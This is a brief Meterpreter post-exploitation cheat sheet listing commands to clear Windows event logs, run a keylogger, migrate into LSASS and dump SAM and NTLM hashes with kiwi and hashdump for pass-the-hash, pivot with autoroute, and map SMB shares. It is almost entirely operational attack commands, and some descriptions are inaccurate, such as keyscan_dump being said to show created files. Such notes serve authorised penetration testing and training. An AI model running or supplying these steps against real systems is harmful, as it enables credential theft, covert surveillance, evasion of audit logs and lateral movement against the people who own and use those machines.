Meterpreter

Clearing Windows Event Logs (Windows)

Use this command to delete all the Windows Event log:
clearev

Keylogging (Windows)

Exploit a target and gain the Meterpreter shell (like in the previous examples)
Start gain keystrokes (any input on the target) of the target host:
keyscan_start

Show the files that the user have created:
keyscan_dump

Pass-the-Hash attack (Windows) with Metasploit

Exploit a target and gain the Meterpreter shell (like in the previous examples)
In the target Meterpreter shell, get the process ID:
pgrep lsass

Migrate to that ID:
migrate target-id

Get the name of the target system you are using:
getuid

Run Kiwi tool:
load kiwi

Get the admin username and NTLM credentials (hash):
lsa_dump_sam

Get also the LM hash password of the target(s):
hashdump

After you have got the hashes you can run the Metasploit framework again

Save target new ip in Metasploit

After exploit, save the other ip that the target is using:
run autoroute -s new-target-ip

SMB - Samba Shares in a Meterpreter shell

net use D: \\target-ip\share